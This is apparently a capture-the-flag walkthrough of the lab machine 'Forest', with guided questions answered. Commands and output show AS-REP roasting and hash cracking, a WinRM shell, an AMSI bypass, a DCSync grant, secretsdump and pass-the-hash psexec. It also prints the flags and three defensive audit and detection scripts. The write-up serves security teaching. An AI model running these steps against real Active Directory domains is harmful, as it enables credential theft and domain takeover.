Enumeration
Nmap
To begin our enumeration, we run an Nmap scan to gather information about the target services.
nmap -sC -sV -Pn -v 10.129.222.56
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-29 05:19:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2024-10-28T22:19:33-07:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 2h26m50s, deviation: 4h02m31s, median: 6m48s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-10-29T05:19:34
|_ start_date: 2024-10-29T05:17:33
Since we might have missed some ports, we run an all-ports scan to be thorough.
nmap -sC -sV -Pn -v 10.129.222.56 -p- -T4 --min-rate=1000
This reveals some additional open ports:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-29 07:44:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1396/tcp filtered dvl-activemail
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6580/tcp filtered parsec-master
9389/tcp open mc-nmf .NET Message Framing
11530/tcp filtered unknown
12879/tcp filtered unknown
19164/tcp filtered unknown
23941/tcp filtered unknown
24913/tcp filtered unknown
25819/tcp filtered unknown
26242/tcp filtered unknown
27992/tcp filtered unknown
33191/tcp filtered unknown
35610/tcp filtered unknown
39952/tcp filtered unknown
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
48384/tcp filtered unknown
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
53033/tcp filtered unknown
53953/tcp filtered unknown
54660/tcp open msrpc Microsoft Windows RPC
59223/tcp filtered unknown
The machine appears to be a Domain Controller for the htb.local domain.
For which domain is this machine a Domain Controller?
htb.local
LDAP
Next, we check if the LDAP service allows anonymous binds using the ldapsearch tool.
ldapsearch -x -H ldap://10.129.222.56 -D '' -w '' -b "DC=htb,DC=local"
The output confirms that anonymous binding is allowed, giving us some valuable information about the domain structure.
# extended LDIF
#
# LDAPv3
# base <DC=htb,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# htb.local
dn: DC=htb,DC=local
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=htb,DC=local
instanceType: 5
whenCreated: 20190918174549.0Z
whenChanged: 20241029051723.0Z
subRefs: DC=ForestDnsZones,DC=htb,DC=local
subRefs: DC=DomainDnsZones,DC=htb,DC=local
subRefs: CN=Configuration,DC=htb,DC=local
...
Which of the following services allows for anonymous authentication and can provide us with valuable information about the machine?
- LDAP
To further enumerate the domain, we use the windapsearch tool, which is useful for querying LDAP information in Active Directory.
git clone https://github.com/ropnop/windapsearch.git
pip install python-ldap
./windapsearch.py -d htb.local --dc-ip 10.129.222.56 -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.222.56
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD users
[+] Found 28 users:
cn: Guest
cn: DefaultAccount
...
cn: HealthMailbox0659cc188f4c4f9f978f6c2142c4181e
userPrincipalName: HealthMailbox0659cc188f4c4f9f978f6c2142c4181e@htb.local
cn: Sebastien Caron
userPrincipalName: sebastien@htb.local
cn: Lucinda Berger
userPrincipalName: lucinda@htb.local
cn: Andy Hislip
userPrincipalName: andy@htb.local
cn: Mark Brandt
userPrincipalName: mark@htb.local
cn: Santi Rodriguez
userPrincipalName: santi@htb.local
...
[*] Bye!
The -U flag is used to enumerate all users, i.e. objects with objectCategory set to user. We find some user and mailbox accounts, which means that Exchange is installed in the domain. Let's enumerate all other objects in the domain using the objectClass=* filter.
./windapsearch.py -d htb.local --dc-ip 10.129.222.56 --custom "objectClass=*"
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.222.56
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Performing custom lookup with filter: "objectClass=*"
[+] Found 312 results:
...
OU=Service Accounts,DC=htb,DC=local
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
OU=Security Groups,DC=htb,DC=local
...
The query reveals 312 unique objects, including the svc-alfresco service account. Upon researching Alfresco online, we find that the service requires Kerberos pre-authentication to be disabled. This allows us to request an encrypted Ticket Granting Ticket (TGT) for this user. Since the TGT is encrypted with the user's NTLM hash, we can perform an offline brute-force attack to try and obtain the password for svc-alfresco.
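The pre-authentication setting is stored in the DONT_REQ_PREAUTH bit (0x400000) of each account's userAccountControl attribute, so the same LDAP data supports a defensive audit. The following Python script is an added example, not part of the original walkthrough; the LDIF input, including every userAccountControl value and the example-user and old-svc accounts, is constructed.

```python
# Added example: audit an LDIF export for enabled accounts that do not require
# Kerberos pre-authentication. The LDIF below is constructed sample data.
import base64

# userAccountControl bit flags relevant to this audit.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}

SAMPLE_LDIF = """\
# constructed entries; the second DN is folded, the third name is base64
dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: svc-alfresco
userAccountControl: 4260352

dn: CN=example-user,OU=Constructed Sample Unit,DC=htb,DC
 =local
sAMAccountName: example-user
userAccountControl: 66048

dn: CN=old-svc,OU=Service Accounts,DC=htb,DC=local
sAMAccountName:: b2xkLXN2Yw==
userAccountControl: 4194818
"""


def parse_ldif(text):
    """Yield one dict per LDIF entry, handling folded lines and base64 values."""
    unfolded = text.replace("\r\n", "\n").replace("\n ", "")
    for block in unfolded.split("\n\n"):
        entry = {}
        for line in block.splitlines():
            if not line or line.startswith("#"):
                continue
            name, sep, value = line.partition(":")
            if not sep:
                continue
            if value.startswith(":"):  # "attr:: <base64>"
                value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
            entry.setdefault(name.strip().lower(), []).append(value.strip())
        if entry:
            yield entry


def audit(text):
    """Return [(account, [flag names])] for enabled accounts without pre-auth."""
    findings = []
    for entry in parse_ldif(text):
        if "useraccountcontrol" not in entry:
            continue
        uac = int(entry["useraccountcontrol"][0])
        flags = [name for bit, name in UAC_FLAGS.items() if uac & bit]
        if "DONT_REQ_PREAUTH" in flags and "ACCOUNTDISABLE" not in flags:
            account = entry.get("samaccountname", entry.get("dn", ["?"]))[0]
            findings.append((account, flags))
    return findings


if __name__ == "__main__":
    for account, flags in audit(SAMPLE_LDIF):
        print(f"{account}: {', '.join(flags)}")
```

Accounts it reports should either have pre-authentication re-enabled or carry a long random password, since a password like the one cracked below falls to a wordlist.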
Foothold
We use GetNPUsers.py from the Impacket suite to request the TGT for the svc-alfresco account:
impacket-GetNPUsers htb.local/svc-alfresco -dc-ip 10.129.222.56 -no-pass
The output includes a hash:
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for svc-alfresco
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$svc-alfresco@HTB.LOCAL:a193435bdcba770cb6a357b1758775f5$8d9f4e3e039285cda75cff5dcd9be35318a1c63211f305bb162bc72e1935950ed39a520b1368b94e7c3a9593c695ec76e7064aaa133989faf28a52914baf2cd7385e0b55da13365cf7b81803d67fa61e40b80d8e94d92cd138be70944286d18a65f20f03f12f62e5af27e2c6bc630b5db292f962b62a89f5c80623fd858e4c15a0e088449a37355ceb7aa28ab6d6ccc4dcf0f06591564645cf0445b1e9af50e94aab72c5b54f8227623912fcf6fe8147cea507f3480186af58a905dfaf351d1cbdfc418ef70e05d16f56214063b09cc4211cc40687373f5cd07a9f8b2618abce45e456a4d41e
We use Hashcat to crack the AS-REP hash with mode 18200:
└─$ hashcat --help | grep -i "Kerberos"
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocol
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocol
28800 | Kerberos 5, etype 17, DB | Network Protocol
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocol
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocol
28900 | Kerberos 5, etype 18, DB | Network Protocol
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocol
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt
$krb5asrep$23$svc-alfresco@HTB.LOCAL:a193435bdcba770cb6a357b1758775f5$8d9f4e3e039285cda75cff5dcd9be35318a1c63211f305bb162bc72e1935950ed39a520b1368b94e7c3a9593c695ec76e7064aaa133989faf28a52914baf2cd7385e0b55da13365cf7b81803d67fa61e40b80d8e94d92cd138be70944286d18a65f20f03f12f62e5af27e2c6bc630b5db292f962b62a89f5c80623fd858e4c15a0e088449a37355ceb7aa28ab6d6ccc4dcf0f06591564645cf0445b1e9af50e94aab72c5b54f8227623912fcf6fe8147cea507f3480186af58a905dfaf351d1cbdfc418ef70e05d16f56214063b09cc4211cc40687373f5cd07a9f8b2618abce45e456a4d41e:s3rvice
Session..........: hashcat
Status...........: Cracked
...
After successfully cracking the hash, we find the password for svc-alfresco is s3rvice.
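On the domain controller, a request like the one above is recorded as Security event 4768 with PreAuthType 0, and the etype 23 reply appears as TicketEncryptionType 0x17. The following Python script is an added example, not part of the original walkthrough; it assumes events exported as JSON lines, and every event, timestamp, source address and the svc-legacy account is constructed.

```python
# Added example: flag TGT requests (Security event 4768) that succeeded without
# Kerberos pre-authentication. All events below are constructed sample data.
import json
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23, the "$krb5asrep$23$" prefix seen in the walkthrough

SAMPLE_EVENTS = """\
{"EventID": 4768, "TimeCreated": "2024-10-29T05:31:02Z", "TargetUserName": "sebastien", "Status": "0x0", "TicketEncryptionType": "0x12", "PreAuthType": "2", "IpAddress": "::ffff:192.0.2.20"}
{"EventID": 4768, "TimeCreated": "2024-10-29T05:40:11Z", "TargetUserName": "svc-alfresco", "Status": "0x0", "TicketEncryptionType": "0x17", "PreAuthType": "0", "IpAddress": "::ffff:192.0.2.66"}
{"EventID": 4768, "TimeCreated": "2024-10-29T05:40:12Z", "TargetUserName": "svc-legacy", "Status": "0x0", "TicketEncryptionType": "0x12", "PreAuthType": "0", "IpAddress": "::ffff:192.0.2.66"}
{"EventID": 4768, "TimeCreated": "2024-10-29T05:40:13Z", "TargetUserName": "nosuchuser", "Status": "0x6", "TicketEncryptionType": "0xFFFFFFFF", "PreAuthType": "-", "IpAddress": "::ffff:192.0.2.66"}
{"EventID": 4624, "TimeCreated": "2024-10-29T05:41:00Z", "TargetUserName": "sebastien"}
this line is damaged and must be skipped
"""


def detect(lines):
    """Return [(time, user, source, severity)] for successful no-pre-auth requests."""
    alerts = []
    for line in lines.splitlines():
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # tolerate damaged lines in the export
        if not isinstance(ev, dict) or ev.get("EventID") != 4768:
            continue
        # Status 0x0 = ticket issued; PreAuthType "0" = no pre-authentication data
        # ("2" is an encrypted timestamp, "-" appears on failed requests).
        if ev.get("Status", "").lower() != "0x0" or ev.get("PreAuthType") != "0":
            continue
        etype = int(ev.get("TicketEncryptionType", "0x0"), 16)
        # RC4 replies are the cheapest to attack offline, so rank them higher.
        severity = "high" if etype == RC4_HMAC else "medium"
        source = ev.get("IpAddress", "").replace("::ffff:", "")
        alerts.append((ev["TimeCreated"], ev["TargetUserName"], source, severity))
    return alerts


def accounts_by_source(alerts):
    """Group affected accounts per source to spot one host sweeping several."""
    grouped = defaultdict(set)
    for _, user, source, _ in alerts:
        grouped[source].add(user)
    return {src: sorted(users) for src, users in grouped.items()}


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for alert in found:
        print(alert)
    print(accounts_by_source(found))
```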
Verify that we can log in over WinRM (optional):
└─$ nxc winrm 10.129.222.56
WINRM 10.129.222.56 5985 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
With port 5985 open, we attempt to log in via WinRM using evil-winrm:
evil-winrm -i 10.129.222.56 -u svc-alfresco -p s3rvice
We successfully gain an interactive shell and retrieve the user flag.
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-alfresco> ls
Directory: C:\Users\svc-alfresco
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/23/2019 2:16 PM Desktop
d-r--- 9/22/2019 4:02 PM Documents
d-r--- 7/16/2016 6:18 AM Downloads
d-r--- 7/16/2016 6:18 AM Favorites
d-r--- 7/16/2016 6:18 AM Links
d-r--- 7/16/2016 6:18 AM Music
d-r--- 7/16/2016 6:18 AM Pictures
d----- 7/16/2016 6:18 AM Saved Games
d-r--- 7/16/2016 6:18 AM Videos
*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls
Directory: C:\Users\svc-alfresco\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/28/2024 10:18 PM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> cat user.txt
840ae1ef2df79bf36733a3266272a119
Which user has Kerberos Pre-Authentication disabled?
svc-alfresco
What is the password of the user svc-alfresco?
s3rvice
To what port can we connect with these creds to get an interactive shell?
- 5985
Privilege Escalation
To escalate privileges, we use BloodHound to enumerate possible paths to higher privileges. First, we upload and execute SharpHound to collect data for BloodHound:
https://github.com/BloodHoundAD/BloodHound/releases
https://github.com/BloodHoundAD/SharpHound/releases
I used an older version of SharpHound.exe, which was already available in my local Tools folder.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload SharpHound.exe
Info: Uploading /home/kali/Tools/SharpHound.exe to C:\Users\svc-alfresco\Documents\SharpHound.exe
Data: 1402880 bytes of 1402880 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> .\SharpHound.exe
2024-10-29T00:59:44.2900966-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-10-29T00:59:44.4778281-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-10-29T00:59:44.5090391-07:00|INFORMATION|Initializing SharpHound at 12:59 AM on 10/29/2024
2024-10-29T00:59:44.7900992-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for htb.local : FOREST.htb.local
2024-10-29T00:59:44.8213506-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-10-29T00:59:45.2589123-07:00|INFORMATION|Beginning LDAP search for htb.local
2024-10-29T00:59:45.4307416-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-10-29T00:59:45.4307416-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-10-29T01:00:16.0714815-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 38 MB RAM
2024-10-29T01:00:29.8995766-07:00|INFORMATION|Consumers finished, closing output channel
2024-10-29T01:00:29.9777004-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-10-29T01:00:30.1495755-07:00|INFORMATION|Status: 161 objects finished (+161 3.659091)/s -- Using 46 MB RAM
2024-10-29T01:00:30.1495755-07:00|INFORMATION|Enumeration finished in 00:00:44.8989341
2024-10-29T01:00:30.2589592-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings.
117 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-10-29T01:00:30.2906329-07:00|INFORMATION|SharpHound Enumeration Completed at 1:00 AM on 10/29/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/29/2024 1:00 AM 18885 20241029010029_BloodHound.zip
-a---- 10/29/2024 1:00 AM 19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 10/29/2024 12:59 AM 1052160 SharpHound.exe
-a---- 10/29/2024 12:56 AM 1308348 SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20241029010029_BloodHound.zip
Info: Downloading C:\Users\svc-alfresco\Documents\20241029010029_BloodHound.zip to 20241029010029_BloodHound.zip
Info: Download successful!
Start neo4j
└─$ sudo neo4j start
[sudo] password for kali:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:142804). It is available at http://localhost:7474
There may be a short delay until the server is ready.
After running BloodHound and uploading the collected data, we search for the svc-alfresco user and mark it as owned. Double-clicking the node displays its properties on the right. We discover that svc-alfresco is a member of nine groups through nested memberships. Clicking on the number 9 reveals the detailed membership graph.
One of the nested groups is Account Operators, which is a privileged AD group. According to the documentation, members of the Account Operators group can create and modify users and add them to non-protected groups. We take note of this and then explore potential paths to Domain Admins by selecting the Shortest Path to High Value Targets query.
One of the identified paths shows that the Exchange Windows Permissions group has WriteDACL privileges on the domain. This permission allows a user to modify ACLs on an object, which means we can add a user to this group and grant them DCSync privileges.
Which group has WriteDACL permissions over the HTB.LOCAL domain?
Exchange Windows Permissions
The user svc-alfresco is a member of a group that allows them to add themself to the "Exchange Windows Permissions" group. Which group is that?
Account Operators
Which of the following attacks can you perform to elevate your privileges with a user that has WriteDACL on the domain?
DCSync
With the WriteDACL permission, we add a new user (joe) to the Exchange Windows Permissions group and grant it DCSync rights.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user joe P@ssw0rd123 /add /domain
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" joe /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" joe /add
The command completed successfully.
The Bypass-4MSI command is used to bypass Windows Defender before importing the script. We then use Add-ObjectACL with joe's credentials to assign DCSync rights to the user.
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> menu
By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Invoke-BloodHound
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Bypass-4MSI
Info: Patching 4MSI, please be patient...
[+] Success!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
Info: Uploading /home/kali/Tools/PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> powershell -ep bypass
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\svc-alfresco\Documents>
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . .\PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $pass = convertto-securestring 'P@ssw0rd123' -asplain -force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $cred = new-object system.management.automation.pscredential('htb\joe', $pass)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ObjectACL -PrincipalIdentity joe -Credential $cred -Rights DCSync
Finally, we use secretsdump.py from Impacket to dump the domain hashes:
└─$ impacket-secretsdump htb/joe@10.129.222.56
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
...
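Both the WriteDACL grant and the replication rights that make up DCSync are visible to a defender as ACEs on the domain object. The following Python script is an added example, not part of the original walkthrough: it parses a security descriptor in SDDL form (for instance the Sddl property returned by Get-Acl on the AD: drive) and reports principals outside an allow-list. The SIDs, the sample SDDL and the allow-list are assumptions made for the example.

```python
# Added example: audit the domain head's DACL for non-default principals that can
# rewrite it (WriteDACL) or replicate secrets (DCSync). Sample data is constructed.
import re

GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All
WRITE_DAC, CONTROL_ACCESS, GENERIC_ALL = 0x40000, 0x100, 0x10000000

# Assumption: SDDL aliases expected to hold these rights (Administrators, Domain and
# Enterprise Admins, SYSTEM, domain controller groups). Tune per environment.
EXPECTED = {"BA", "DA", "EA", "SY", "ED", "DD", "RO"}

# Constructed SIDs standing in for a delegated group, a new user and one other.
GROUP_SID = "S-1-5-21-1111111111-2222222222-3333333333-1121"
USER_SID = "S-1-5-21-1111111111-2222222222-3333333333-9601"
OTHER_SID = "S-1-5-21-1111111111-2222222222-3333333333-1300"
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    f"(OA;;CR;{GET_CHANGES};;ED)(OA;;CR;{GET_CHANGES_ALL};;DD)"
    f"(OA;;CR;{GET_CHANGES};;BA)(OA;;CR;{GET_CHANGES_ALL};;BA)"
    f"(A;CI;WD;;;{GROUP_SID})"                      # WriteDACL on the domain
    f"(OA;;CR;{GET_CHANGES};;{USER_SID})(OA;;CR;{GET_CHANGES_ALL};;{USER_SID})"
    f"(OA;;CR;{GET_CHANGES};;{OTHER_SID})"          # one right alone: not DCSync
    f"(A;CIIO;0x40000;;;{OTHER_SID})"               # inherit-only: not on this object
    "(A;;RPLCLORC;;;AU)"
    "S:(AU;SA;WDWO;;;WD)"                           # SACL audit ACE, ignored
)

def pairs(text):
    """Split an SDDL flag or right string such as 'RPLCLORC' into two-letter codes."""
    return {text[i:i + 2] for i in range(0, len(text), 2)}

def parse_rights(rights):
    """Normalise symbolic or hexadecimal access masks to the codes we care about."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        names = (("WD", WRITE_DAC), ("CR", CONTROL_ACCESS), ("GA", GENERIC_ALL))
        return {name for name, bit in names if mask & bit}
    return pairs(rights)

def audit_dacl(sddl):
    """Return {trustee: sorted findings} for allow ACEs held outside EXPECTED."""
    findings, replication = {}, {}
    for ace in re.findall(r"\(([^()]*)\)", sddl):
        fields = ace.split(";")
        if len(fields) < 6 or fields[0] not in ("A", "OA"):
            continue                                # deny and audit ACEs
        flags, rights = pairs(fields[1]), parse_rights(fields[2])
        guid, trustee = fields[3].lower(), fields[5]
        if trustee in EXPECTED or "IO" in flags:
            continue
        if rights & {"WD", "GA"}:
            findings.setdefault(trustee, set()).add("WriteDACL")
        if rights & {"CR", "GA"}:                   # empty GUID = all extended rights
            granted = {guid} if guid else {GET_CHANGES, GET_CHANGES_ALL}
            replication.setdefault(trustee, set()).update(granted)
    for trustee, guids in replication.items():
        if {GET_CHANGES, GET_CHANGES_ALL} <= guids:
            findings.setdefault(trustee, set()).add("DCSync")
    return {t: sorted(f) for t, f in findings.items()}

if __name__ == "__main__":
    for trustee, issues in audit_dacl(SAMPLE_SDDL).items():
        print(trustee, issues)
```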
We obtain the NTLM hash for the Administrator account, which we use to gain an administrative shell via psexec:
└─$ impacket-psexec -hashes 00000000000000000000000000000000:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.129.222.56
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.129.222.56.....
[*] Found writable share ADMIN$
[*] Uploading file wSsodTYp.exe
[*] Opening SVCManager on 10.129.222.56.....
[*] Creating service nogH on 10.129.222.56.....
[*] Starting service nogH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 61F2-A88F
Directory of C:\Users\Administrator\Desktop
09/23/2019 02:15 PM <DIR> .
09/23/2019 02:15 PM <DIR> ..
10/28/2024 10:18 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 10,437,902,336 bytes free
C:\Users\Administrator\Desktop> type root.txt
fb5b47930b35028c65bae2c6c8e22ec3
C:\Users\Administrator\Desktop> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : FOREST
Primary Dns Suffix . . . . . . . : htb.local
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : htb.local
htb
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
Physical Address. . . . . . . . . : 00-50-56-B9-37-14
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : dead:beef::be(Preferred)
Lease Obtained. . . . . . . . . . : Monday, October 28, 2024 10:17:26 PM
Lease Expires . . . . . . . . . . : Tuesday, October 29, 2024 2:17:26 AM
IPv6 Address. . . . . . . . . . . : dead:beef::ccb2:9ff9:585d:b629(Preferred)
Link-local IPv6 Address . . . . . : fe80::ccb2:9ff9:585d:b629%5(Preferred)
IPv4 Address. . . . . . . . . . . : 10.129.222.56(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Lease Obtained. . . . . . . . . . : Monday, October 28, 2024 10:17:38 PM
Lease Expires . . . . . . . . . . : Tuesday, October 29, 2024 2:17:38 AM
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:acf1%5
10.129.0.1
DHCP Server . . . . . . . . . . . : 10.129.0.1
DHCPv6 IAID . . . . . . . . . . . : 50352214
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2E-B2-28-3C-00-50-56-B9-37-14
DNS Servers . . . . . . . . . . . : 127.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled
Connection-specific DNS Suffix Search List :
htb
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htb
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
We successfully retrieve the root flag.